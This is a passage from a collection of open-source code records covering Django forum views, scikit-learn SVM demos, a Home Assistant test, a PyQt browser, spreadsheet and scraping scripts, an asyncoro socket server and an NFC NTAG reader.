Messages can be\n “liked” too and this is reversible.\n \"\"\"\n topic = get_object_or_404(Topic, slug=slug)\n messages = Message.objects.filter(topic=topic)\n context = {'topic': topic,\n 'form': MessageForm(),\n 'messages': messages}\n if request.user.is_authenticated():\n if request.method == 'POST':\n msg_form = MessageForm(request.POST)\n if msg_form.is_valid():\n message = msg_form.save(commit=False)\n message.author = request.user\n message.topic = topic\n message.save()\n msg_form.save_m2m()\n return redirect('topic', slug=slug)\n else:\n context['form'] = msg_form # render errors\n return render(request, 'glass/topic.html', context)\n\n@login_required\ndef new_topic(request):\n \"\"\"\n Creation of new topics.\n\n This is mainly about processing of ‘TopicForm’ and ‘MessageForm’, since\n every topic must have initial message.\n \"\"\"\n if request.method == 'GET':\n context = {'topic_form': TopicForm(prefix='topic'),\n 'msg_form': MessageForm(prefix='msg')}\n elif request.method == 'POST':\n topic_form = TopicForm(request.POST, prefix='topic')\n msg_form = MessageForm(request.POST, prefix='msg')\n context = {'topic_form': topic_form,\n 'msg_form': msg_form}\n if topic_form.is_valid():\n new_topic = topic_form.save()\n if msg_form.is_valid():\n new_msg = msg_form.save(commit=False)\n new_msg.author = request.user\n new_msg.topic = new_topic\n new_msg.save()\n msg_form.save_m2m()\n return redirect('topic', slug=new_topic.slug)\n return render(request, 'glass/new-topic.html', context=context)\n\n@login_required\ndef user(request, username):\n \"\"\"\n User profile.\n\n Every registered user can see all profiles, but only his own profile is\n editable for him. This page also displays latest messages authored by\n the user.\n \"\"\"\n user = get_object_or_404(User, username=username)\n latest_msgs = Message.objects.filter(author=user).order_by('-id')[:5]\n context = {'this_user': user, 'latest_msgs': latest_msgs}\n if request.user == user:\n if request.method == 'GET':\n context['form'] = UserForm(instance=user)\n elif request.method == 'POST':\n form = UserForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n else: # if form is invalid, render it to show messages\n context['form'] = form\n return render(request, 'glass/user.html', context=context)\n\ndef carefully_get_msg(request):\n \"\"\"\n Return message according to parameters in ‘request’ or ‘None’. Request\n should contain parameter named ‘msg_id’ identifying the message.\n \"\"\"\n user = request.user\n if not user.is_authenticated():\n return None\n msg_id = request.GET.get('msg_id')\n if not msg_id:\n return None\n try:\n msg = Message.objects.get(id=msg_id)\n except Message.DoesNotExist:\n return None\n return msg\n\n@require_GET\ndef msg_like(request):\n \"\"\"\n This is how users can like messages.\n\n Invoked by Java Script from topic page.\n \"\"\"\n msg = carefully_get_msg(request)\n if not msg:\n return HttpResponse('0')\n if msg.likers.filter(username=request.user.username).exists():\n msg.likers.remove(request.user)\n else:\n msg.likers.add(request.user)\n msg.save()\n return HttpResponse(str(msg.likes()))\n\n@require_GET\ndef msg_del(request):\n \"\"\"\n Deletion of message.\n\n Quite obviously, it deletes messages. Only last message in thread can be\n deleted and only by its author. 
Staff can delete everything, of course.\n    \"\"\"\n    msg = carefully_get_msg(request)\n    if not msg or not msg.editable_by(request.user):\n        return HttpResponse('')\n    topic = msg.topic\n    msg.delete()\n    # if this is the single message in topic, delete topic:\n    if not Message.objects.filter(topic=topic).exists():\n        topic.delete()\n    return HttpResponse(\"deleted\")\n","repo_name":"mrkkrp/glass","sub_path":"glass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"15500299977","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.preprocessing import PolynomialFeatures, StandardScaler\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import Pipeline\nfrom LogisticRegression.drawDecisionBoundary import plot_decision_boundary\nfrom sklearn.svm import SVC\n\n\ndef PolynomiaSVC(degree, C=1.0):\n    return Pipeline([\n        ('poly', PolynomialFeatures(degree=degree)),\n        ('std_scaler', StandardScaler()),\n        ('linearSVC', LinearSVC(C=C))\n    ])\n\ndef PolynomialKernelSVC(degree, C=1.0):\n    return Pipeline([\n        ('std_scaler', StandardScaler()),\n        ('kernelSVC', SVC(kernel='poly', degree=degree, C=C))\n    ])\n\nif __name__ == \"__main__\":\n\n    # 使用sklearn生成数据\n    X, y = datasets.make_moons(noise=0.15, random_state=666)\n\n    # 绘制数据集图像\n    plt.scatter(X[y==0, 0], X[y==0, 1])\n    plt.scatter(X[y==1, 0], X[y==1, 1])\n    plt.show()\n\n    # 使用多项式特征的SVM\n    poly_svc = PolynomiaSVC(degree=3)\n    poly_svc.fit(X, y)\n\n    # 绘制决策边界\n    plot_decision_boundary(poly_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n    plt.scatter(X[y==0, 0], X[y==0, 1])\n    plt.scatter(X[y==1, 0], X[y==1, 1])\n    plt.show()\n\n    # 使用多项式核函数的SVM\n    poly_kernel_svc = PolynomialKernelSVC(degree=3)\n    poly_kernel_svc.fit(X, y)\n\n    # 绘制决策边界\n    plot_decision_boundary(poly_kernel_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n    plt.scatter(X[y==0, 0], X[y==0, 1])\n    plt.scatter(X[y==1, 0], X[y==1, 1])\n    plt.show()","repo_name":"ediltwwj/MachinelLearning","sub_path":"SVM/sklearnSvm2.py","file_name":"sklearnSvm2.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"9052856933","text":"\"\"\"MasterTherm Sensor Tests.\"\"\"\nfrom unittest.mock import patch\nimport pytest\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.const import Platform, UnitOfTemperature\n\nfrom pytest_homeassistant_custom_component.common import MockConfigEntry\nfrom custom_components.mastertherm.const import (\n    DOMAIN,\n    MasterthermSensorEntityDescription,\n)\n\nfrom .conftest import APIMock\n\n\n@pytest.fixture(autouse=True)\ndef override_entity():\n    \"\"\"Override the ENTITIES to test Sensors.\"\"\"\n    with patch(\n        \"custom_components.mastertherm.ENTITIES\",\n        {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n    ), patch(\n        \"custom_components.mastertherm.coordinator.ENTITIES\",\n        {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n    ):\n        yield\n\n\nasync def test_sensor_setup(\n    hass: HomeAssistant,\n    mock_configdata: dict,\n):\n    \"\"\"Test Sensors are Created and Updated.\"\"\"\n    # Setting up using Mock requires the actual config not the Domain\n    # changed the way the test works to send without domain.\n    api_mock = APIMock()\n    entry = MockConfigEntry(domain=DOMAIN, data=mock_configdata[DOMAIN])\n    entry.add_to_hass(hass)\n\n    with patch(\n        \"custom_components.mastertherm.config_flow.authenticate\",\n        
return_value={\"status\": \"success\"},\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.connect\",\n side_effect=api_mock.connect,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.refresh\",\n side_effect=api_mock.refresh,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_devices\",\n side_effect=api_mock.get_devices,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_device_data\",\n side_effect=api_mock.get_device_data,\n ):\n await hass.config_entries.async_setup(entry.entry_id)\n await hass.async_block_till_done()\n\n # Check we called the Mock and we have a Sensor.\n assert (\n hass.states.async_entity_ids_count(Platform.SENSOR) > 0\n ), \"Sensors Failed to Create\"\n\n # Check the Temperature Sensor\n state = hass.states.get(\"sensor.mt_1234_1_outside_temp\")\n assert state.state == \"4.9\"\n assert state.name == \"Outside Temperature\"\n assert state.attributes.get(\"unit_of_measurement\") == UnitOfTemperature.CELSIUS\n","repo_name":"sHedC/homeassistant-mastertherm","sub_path":"tests/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"19725361992","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-12 10:28:27\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:36\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport sys\nfrom qtpy.QtCore import Qt, QUrl\nfrom qtpy.QtGui import QIcon\nfrom qtpy.QtWebEngineWidgets import QWebEngineView\nfrom qtpy.QtWidgets import QApplication, QWidget, QPushButton, QLineEdit, QVBoxLayout, QHBoxLayout\n\n\nclass Demo(QWidget):\n def __init__(self):\n super(Demo, self).__init__()\n self.resize(1000, 600)\n\n self.back_btn = QPushButton(self)\n self.forward_btn = QPushButton(self)\n self.refresh_btn = QPushButton(self)\n self.zoom_in_btn = QPushButton(self)\n self.zoom_out_btn = QPushButton(self)\n self.url_le = QLineEdit(self)\n\n self.browser = QWebEngineView()\n \n self.h_layout = QHBoxLayout()\n self.v_layout = QVBoxLayout()\n\n self.layout_init()\n self.btn_init()\n self.le_init()\n self.browser_init()\n\n def layout_init(self):\n self.h_layout.setSpacing(0)\n self.h_layout.addWidget(self.back_btn)\n self.h_layout.addWidget(self.forward_btn)\n self.h_layout.addWidget(self.refresh_btn)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.url_le)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.zoom_in_btn)\n self.h_layout.addWidget(self.zoom_out_btn)\n\n self.v_layout.addLayout(self.h_layout)\n self.v_layout.addWidget(self.browser)\n\n self.setLayout(self.v_layout)\n\n def browser_init(self):\n self.browser.load(QUrl('https://baidu.com'))\n self.browser.urlChanged.connect(lambda: self.url_le.setText(self.browser.url().toDisplayString()))\n\n def btn_init(self):\n self.back_btn.setIcon(QIcon('images/back.png'))\n self.forward_btn.setIcon(QIcon('images/forward.png'))\n self.refresh_btn.setIcon(QIcon('images/refresh.png'))\n self.zoom_in_btn.setIcon(QIcon('images/zoom_in.png'))\n self.zoom_out_btn.setIcon(QIcon('images/zoom_out.png'))\n\n self.back_btn.clicked.connect(self.browser.back)\n self.forward_btn.clicked.connect(self.browser.forward)\n self.refresh_btn.clicked.connect(self.browser.reload)\n 
self.zoom_in_btn.clicked.connect(self.zoom_in_func)\n self.zoom_out_btn.clicked.connect(self.zoom_out_func)\n\n def le_init(self):\n self.url_le.setFixedWidth(400)\n self.url_le.setPlaceholderText('Search or enter website name')\n\n def keyPressEvent(self, QKeyEvent):\n if QKeyEvent.key() == Qt.Key_Return or QKeyEvent.key() == Qt.Key_Enter:\n if self.url_le.hasFocus():\n if self.url_le.text().startswith('https://') or self.url_le.text().startswith('http://'):\n self.browser.load(QUrl(self.url_le.text()))\n else:\n self.browser.load(QUrl('https://'+self.url_le.text()))\n\n def zoom_in_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()+0.1)\n\n def zoom_out_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()-0.1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n sys.exit(app.exec_())","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/webWidget.py","file_name":"webWidget.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"} +{"seq_id":"34346025720","text":"#coding=utf-8\n\n# 查找不存在的商家编码\nimport sys\nimport openpyxl\nimport os\nimport user_input\nimport merge_sheet\nimport present\n\nif __name__ == \"__main__\":\n present.use_des()\n print(\"开始处理\\n\")\n\n wb = merge_sheet.load_spec_file(user_input.file_name_original)\n\n # 输出数据的sheet名\n output_sheet_name = \"不存在的商家编码\"\n\n all_sheet_name = wb.get_sheet_names()\n output_sheet = None\n if output_sheet_name not in all_sheet_name:\n print(\"%s不存在, 创建它\" % (output_sheet_name))\n output_sheet = wb.create_sheet(output_sheet_name)\n else:\n print(\"%s已经存在, 先删除它, 再创建它\" % (output_sheet_name))\n wb.remove_sheet(wb[output_sheet_name])\n output_sheet = wb.create_sheet(output_sheet_name)\n\n \"\"\"\n print(\"%s已经存在\" % (output_sheet_name))\n output_sheet = wb[output_sheet_name]\n \"\"\"\n\n # 计算出所有的商家编码\n all_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet2\"], \"j\", 2)\n for cell in cells:\n if cell.value not in all_business_no:\n all_business_no[cell.value] = 1\n all_business_no = all_business_no.keys()\n # print(\"\\n\\nall_business_no = %r\\n\\n\" % (all_business_no))\n\n # 计算出当前存在的商家编码\n existent_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet4\"], \"a\", 2)\n for cell in cells:\n if cell.value not in existent_business_no:\n existent_business_no[cell.value] = 1\n existent_business_no = existent_business_no.keys()\n # print(\"\\n\\nexistent_business_no = %r\\n\\n\" % (existent_business_no))\n\n # 计算出不存在的商家编码\n inexistent_business_no = {}\n for value in all_business_no:\n if value not in existent_business_no:\n if value not in inexistent_business_no:\n inexistent_business_no[value] = 1\n print(\"value = %r, 不存在\" % (value))\n inexistent_business_no = inexistent_business_no.keys()\n print(\"\\n\\ninexistent_business_no = %r\\n\\n\" % (inexistent_business_no))\n\n # 输出数据\n output_sheet.cell(\"a1\").value = \"不存在的商家编码\"\n i = 2\n for value in inexistent_business_no:\n cell_to_do = output_sheet.cell(\"a%d\" % (i))\n cell_to_do.value = value\n i += 1\n\n wb.save(user_input.file_name_original)\n present.after_process()\n\n","repo_name":"lisifenggithub/process_excel","sub_path":"find_inexistent_business_no.py","file_name":"find_inexistent_business_no.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35111516325","text":"from . 
import views\nfrom django.urls import path\n\n# List of all url patterns\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"homes\", views.home, name=\"home\"),\n path(\"main_menu\", views.main_menu, name=\"main_menu\"),\n path(\"contact_us\", views.contact_us, name=\"contact_us\"),\n path(\"change_price\", views.change_price, name=\"change_price\"),\n path(\"change_rate\", views.change_rate, name=\"change_rate\")\n]\n","repo_name":"karimammar135/forn_el_batoul","sub_path":"forn_el_batoul/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29247588088","text":"#!/usr/bin/env python\n\n# server program for client (tut_sock_client.py) sending requests with\n# sockets (asynchronous network programming);\n# see http://asyncoro.sourceforge.net/tutorial.html for details.\n\n# run this program and then the client on the same node. If they are on\n# different computers, 'host' address must be changed appropriately.\n\nimport sys, socket\nimport asyncoro\n\ndef process(conn, coro=None):\n global n\n if sys.version_info.major >= 3:\n eol = ord('/')\n else:\n eol = '/'\n data = ''.encode()\n while True:\n data += yield conn.recv(128)\n if data[-1] == eol:\n break\n conn.close()\n n += 1\n print('received: %s' % data)\n\ndef server(host, port, coro=None):\n coro.set_daemon()\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = asyncoro.AsyncSocket(sock)\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((host, port))\n sock.listen(128)\n\n while True:\n conn, addr = yield sock.accept()\n asyncoro.Coro(process, conn)\n\nn = 0\nasyncoro.Coro(server, '127.0.0.1', 8010)\n\nif sys.version_info.major > 2:\n read_input = input\nelse:\n read_input = raw_input\nwhile True:\n cmd = read_input().strip().lower()\n if cmd == 'exit' or cmd == 'quit':\n break\nprint('n = %d' % n)\n","repo_name":"pgiri/asyncoro","sub_path":"examples/tut_sock_server.py","file_name":"tut_sock_server.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"36"} +{"seq_id":"6118513573","text":"import random\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef get_xkcd_photo(index=None):\n idx = index or random.randint(0, 1900)\n r = requests.get(\"https://xkcd.com/{}/\".format(idx))\n\n return get_image(r.text)\n\n\ndef get_image(html_doc):\n obj = BeautifulSoup(html_doc, 'html.parser')\n return \"http:\"+obj.find(id=\"comic\").find('img').get('src')\n\n\nif __name__ == \"__main__\":\n print(get_xkcd_photo())\n","repo_name":"andrea-lascola/SimpleChatbot","sub_path":"app/modules/photo/xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"9859660569","text":"import numpy as np\nfrom pg import discount_rewards\n\ndef memory_stack(memory, num_process, state_space, action_space):\n memory = np.array(memory)\n state, action, reward = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for i in range(num_process):\n state_stack, action_stack, reward_stack = np.empty(shape=[0, state_space]), np.empty(shape=[0, action_space]), np.empty(shape=[0, 1])\n for j in range(memory.shape[0]):\n if type(memory[j][1][i]) != str:\n state_stack = np.vstack([state_stack, memory[j][0][i]])\n action_stack = 
np.vstack([action_stack, memory[j][1][i]])\n reward_stack = np.vstack([reward_stack, memory[j][2][i]])\n discounted_stack = discount_rewards(reward_stack)\n state = np.vstack([state, state_stack])\n action = np.vstack([action, action_stack])\n reward = np.vstack([reward, discounted_stack])\n return state, action, reward\n\ndef hot_action(actions, num_process, action_space):\n action_list = []\n for action in actions:\n if action == 'done':\n a = 'done'\n else:\n a = np.zeros(action_space)\n a[action] = 1\n action_list.append(a)\n return action_list\n\ndef get_action(pg, each_terminal, num_process, state):\n actions = []\n for i in range(num_process):\n if not each_terminal[i]:\n actions.append(pg.choose_action([state[i]]))\n else:\n actions.append('done')\n return actions\n\ndef check_reward(info, num_process):\n data, reward = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n reward.append(d[1])\n return reward\n\ndef check_state(info, num_process):\n data, state = [], []\n for i in info:\n data.append(list(i))\n for d in data:\n state.append(d[0])\n return state\n\ndef check_done(info, num_process):\n data, done, all_done = [], [], False\n for i in info:\n data.append(list(i))\n for d in data:\n done.append(d[2])\n if sum(list(map(int, done))) == num_process:\n all_done = True\n return done, all_done","repo_name":"chagmgang/synch_pysc2","sub_path":"synchronized_PG/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"4061083208","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n\n@athor:weifeng.guo \n@data:2019/1/7 14:44\n@filename:pandas_read_and_write_excel\n\n\"\"\"\nimport pandas as pd\nimport sys\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\ndata_frame = pd.read_excel(input_file, sheetname='january_2013')\nwriter = pd.ExcelWriter(output_file)\ndata_frame.to_excel(writer, sheet_name='jan_13_output', index=False)\nwriter.save()","repo_name":"guoweifeng216/python","sub_path":"liyong_python_jingxing_shujufenxi/python_basic/chapter3/pandas_read_and_write_excel.py","file_name":"pandas_read_and_write_excel.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43844792479","text":"# Guess Number 🔢\n# Codédex\n\nguess = 0\ntries = 0\n\nwhile guess != 6 and tries < 5:\n guess = int(input('Guess the number: '))\n tries = tries + 1\n\nif guess != 6:\n print('You ran out of tries.')\nelse:\n print('You got it!')\n","repo_name":"codedex-io/python-101","sub_path":"4-loops/18_guess_number.py","file_name":"18_guess_number.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"36"} +{"seq_id":"40272870440","text":"\n# Prepare data\nwith open(\"day07.txt\", \"r\") as f:\n data = f.read().splitlines()\ndata = data[0].split(\",\")\ndata = [int(d) for d in data]\n# Sort and find the median\ndata.sort()\nmedian = data[len(data) // 2]\n# Calculate fuel for part 1\nfuel = 0\nfor n in data:\n diff = abs(n-median)\n print(\"adding \",n,\"diff\",diff)\n fuel += diff\nprint(fuel)\n\ndef triangular(n):\n return n * (n+1) / 2\n\nresults = []\nlowestfuel = 999999999999\nlowestfueli = 0\nfor objective in range(0,1899):\n fueltotal=0\n for n in data:\n fuelindividual = triangular(abs(n-objective)) # 1 +2 +3 +4 +5 ,,, 1 3 6 10 15\n fueltotal += fuelindividual\n # print(\"For 
element\",n,\"fuel\",fuelindividual)\n print(objective,fueltotal)\n if fueltotal < lowestfuel:\n lowestfuel = fueltotal\n lowestfueli = objective\n results.append((objective,fueltotal))\nprint(\"optimal position\",lowestfueli, \"requires lowest fuel\",lowestfuel)\n\n","repo_name":"paulbaumgarten/advent-of-code","sub_path":"2021/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"26606763909","text":"t=int(input())\n\na=300\nb=60\nc=10\n\ntime=[a,b,c]\nresult=[]\n\nfor sec in time:\n ans=0\n ans+=t//sec\n t%=sec\n result.append(ans)\n\nif t==0:\n print(*result)\nelse:\n print(-1)\n\n \n \n","repo_name":"realme1st/Algorithm-study","sub_path":"Baekjoon/그리디/전자레인지 (10162).py","file_name":"전자레인지 (10162).py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1699505213","text":"import torch\nimport torch.nn as nn\nfrom transformers import AutoModel, AutoTokenizer\nfrom transformers.models.deberta_v2.modeling_deberta_v2 import *\n\n\nclass RobertaWrapper(nn.Module):\n def __init__(self, device, n_classes, truncation_list = None):\n super().__init__()\n self.truncation_list = truncation_list\n self.model = AutoModel.from_pretrained(\"roberta-base\")\n self.tokenizer = AutoTokenizer.from_pretrained(\"roberta-base\")\n self.classifier = nn.Linear(768, n_classes)\n self.device = device\n\n def forward(self, input_texts):\n input_batch = self.tokenizer(input_texts, padding=True, truncation=True, return_tensors=\"pt\")\n input_batch = {key: tensor.to(self.device) for key, tensor in input_batch.items()}\n if self.truncation_list is None:\n output = self.model(**input_batch).last_hidden_state\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n else:\n input_tokens = input_batch['input_ids']\n embeds = self.model.embeddings(input_tokens)\n total_length = embeds.shape[1]\n for i in range(len(self.truncation_list)):\n output = self.model.encoder.layer[i](embeds)[0]\n cur_length = max(1, int(self.truncation_list[i] * total_length))\n output = output[:, :cur_length, :]\n output = torch.mean(output, dim=1)\n return self.classifier(output)\n","repo_name":"faaaaaaaaaaaaakeacc/effective_sequence_compression","sub_path":"effective_sequence_compression/models/roberta.py","file_name":"roberta.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1991795328","text":"import binascii\n\nfrom .card import nfc_tlv_parse, CardError\n\n\nclass NtagMixin:\n def fast_read(self, start, end):\n length = (end + 1 - start) * 4\n return self.communicatethru([0x3A, start, end], response_length=length)\n\n def read_cnt(self, counter):\n response = self.communicatethru([0x39, counter], response_length=3)\n if response:\n return int.from_bytes(response, \"little\")\n return None\n\n def read_sig(self):\n return self.communicatethru([0x3C, 0x00], response_length=32)\n\n def pwd_auth(self, pwd):\n # pwd should be 4 bytes\n return self.communicatethru(b\"\\x1B\" + pwd, response_length=2)\n\n @property\n def ntag_version(self):\n return self.version\n\n @property\n def ntag_model(self):\n return self.model\n\n @property\n def ntag_signature(self):\n if \"ntag_signature\" in self.data:\n return self.data[\"ntag_signature\"]\n try:\n self.data[\"ntag_signature\"] = self.read_sig()\n return 
self.data[\"ntag_signature\"]\n except CardError:\n return None\n\n @property\n def ntag_data(self):\n if \"ntag_data\" in self.data:\n return self.data[\"ntag_data\"]\n if self.ntag_version is None:\n return None\n version_map = {\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x02\\x01\\x00\\x13\\x03\": 0xE6,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x0F\\x03\": 0x2C,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x11\\x03\": 0x86,\n b\"\\x00\\x04\\x04\\x04\\x01\\x00\\x13\\x03\": 0xE6,\n }\n try:\n max_block = version_map[self.ntag_version]\n except KeyError:\n return None\n read_blocks = 56\n data = b\"\"\n for block_start in range(0, max_block, read_blocks):\n block_end = min(block_start + read_blocks, max_block)\n try:\n response = self.fast_read(block_start, block_end)\n except CardError:\n return None\n if response:\n data = data + response\n else:\n return None\n self.data[\"ntag_data\"] = data\n return self.data[\"ntag_data\"]\n\n @property\n def ntag_counter(self):\n if \"ntag_counter\" in self.data:\n return self.data[\"ntag_counter\"]\n try:\n # read block zero to ensure that counter is incremented\n # self.communicatethru([0x3A, 0, 0], response_length=4)\n self.fast_read(0, 0)\n count = self.read_cnt(2)\n if count is not None:\n self.data[\"ntag_counter\"] = count\n return count\n except CardError:\n return None\n\n @property\n def ntag_ndef(self):\n if self.ntag_data is None:\n return None\n cc = self.ntag_data[12:16]\n data = self.ntag_data[16:]\n if cc[0] == 0xE1:\n version = cc[1]\n data_area_size = cc[2] * 8\n read_access = cc[3] >> 4\n write_access = cc[3] & 0x0F\n # print(\"cc\", binascii.hexlify(cc, \" \"))\n # print(\" version {}.{}\".format(version >> 4, version & 0x0F))\n # print(\" data area size {}\".format(data_area_size))\n # print(\" read access {}\".format(read_access))\n # print(\" write access {}\".format(write_access))\n # if len(data) < data_area_size:\n # print(\"fetching more data\")\n # nblocks = (data_area_size - len(data)) / 4\n # data = data + self.read_blocks(7, 6 + nblocks)\n # print(\"data\", data)\n messages = []\n terminated = False\n # print(data)\n for t, l, v in nfc_tlv_parse(data):\n # print(\"tlv\", t, l, v)\n if t == 0xFE:\n terminated = True\n break\n if t == 0x03:\n messages.append(v)\n if not terminated:\n print(\"missing data\")\n return messages\n","repo_name":"timhawes/timhawes_circuitpython_nfc","sub_path":"timhawes_nfc/ntag.py","file_name":"ntag.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18854512250","text":"import cv2 # import the OpenCV module\nimport numpy as np # import the numpy module using the name 'np'.\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef buildCDF(img, outputImageName, cIndex, title):\n hist= cv2.calcHist([img], [cIndex], None, [256], [0, 256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max()/ cdf.max()\n \n fig = plt.figure()\n \n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(),256,[0,256], color = 'r')\n plt.xlim([0,256])\n plt.legend(('cdf','histogram'), loc = 'upper left')\n plt.title(title) # subplot 211 title\n plt.savefig(outputImageName)\n\nif __name__ == \"__main__\":\n imgGrey = cv2.imread('img/messi.jpg',0) # grey scale\n buildCDF(imgGrey, \"result/01-histogram-cfd-messi-grey.png\", 0, \"grey\")\n imgColor = cv2.imread('img/messi.jpg',1) # color BGR scale\n 
buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_b.png\", 0, \"b-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_g.png\", 1, \"g-color\")\n buildCDF(imgColor, \"result/01-histogram-cfd-messi-color_r.png\", 2, \"r-color\")","repo_name":"matitaweb/mumet2017_computer_vision_homework","sub_path":"HOMEWORK_01/cumulative_histogram/cumulative_histogram.py","file_name":"cumulative_histogram.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"7226045656","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom parliament_lk.items import News\n\n\nclass NewsSpider(scrapy.Spider):\n name = 'news'\n allowed_domains = ['parliament.lk']\n start_urls = ['http://parliament.lk/en/news-en?view=news&category=6']\n\n def parse(self, response):\n for news in response.xpath('//td[@width=\"82%\"]/a/@href').extract():\n \tyield scrapy.Request(response.urljoin(news),callback=self.parseNews)\n\n next_page_url = response.xpath('//li[@class=\"pagination-next\"]/a/@href').extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\n\n def parseNews(self, response):\n \tl = ItemLoader(item=News(), response=response)\n \tl.add_xpath('title', '//table[@class=\"newsheader\"]//td//h2[1]/text()')\n \tl.add_xpath('date', '//table[@class=\"newsheader\"]//tr[1]/td[3]/text()')\n \tl.add_xpath('content', '//div[@class=\"inner-div newsarea\"]/div[1]/p[string-length(text()) > 3]/text()')\n \tyield l.load_item()\n","repo_name":"prabod/CS4642-IR-Parliament.lk-Scraper","sub_path":"parliament_lk/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18425277017","text":"from django.urls import path\nfrom work1App import views\n\n\nurlpatterns = [\n path('', views.apiOverview, name='api-Overview'),\n #CRUD\n path('add/', views.add,name='add'),\n path('Search_filter/', views.Search_filter.as_view(),name='Search_filter'),\n path('update//', views.update,name='update'),\n path('remove//', views.remove,name='remove'),\n path('viewAll/', views.viewAll,name='viewAll'),\n \n\n]\n\n","repo_name":"Aju600610/work1-evaluation-ajith","sub_path":"work1pro/work1App/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"3320883982","text":"#!/usr/bin/env python\n\nimport click\n\n@click.option('-o',\n '--opt',\n required=False, \n help='Provide additional data if required')\n@click.argument('argu',\n 